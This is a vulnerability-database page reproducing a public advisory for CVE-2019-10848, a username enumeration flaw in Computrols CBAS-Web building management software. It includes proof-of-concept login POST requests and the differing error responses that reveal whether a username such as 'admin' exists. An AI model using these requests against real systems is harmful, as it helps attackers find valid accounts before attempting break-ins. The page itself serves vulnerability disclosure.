Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Computrols CBAS-Web 19.0.0 Username Enumeration

Related Vulnerabilities: CVE-2019-10848  
Publish Date: 12 Nov 2019
Author: LiquidWorm, applied-risk.com
Source 
                							

                
Computrols CBAS-Web Username Enumeration

Affected versions: 19.0.0 and below
CVE: CVE-2019-10848
Advisory: https://applied-risk.com/resources/ar-2019-009
Paper: https://applied-risk.com/resources/i-own-your-building-management-system

Discovered by Gjoko 'LiquidWorm' Krstic


Testing for non-valid user:

POST /cbas/index.php?m=auth&a=login HTTP/1.1

username=randomuser&password=&challenge=60753c1b5e449de80e21472b5911594d&response=e16371917371b8b70529737813840c62


Response for non-valid user:

<!-- Failed login comments appear here -->
<p class="alert-error">randomuser</p>

========================================================================

Testing for valid user:

POST /cbas/index.php?m=auth&a=login HTTP/1.1

username=admin&password=&challenge=6e4344e7ac62520dba82d7f20ccbd422&response=e09aab669572a8e4576206d5c14befc5s


Response for valid user:

<!-- Failed login comments appear here -->
<p class="alert-error">Invalid username/password combination.  Please try again!</p>

<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started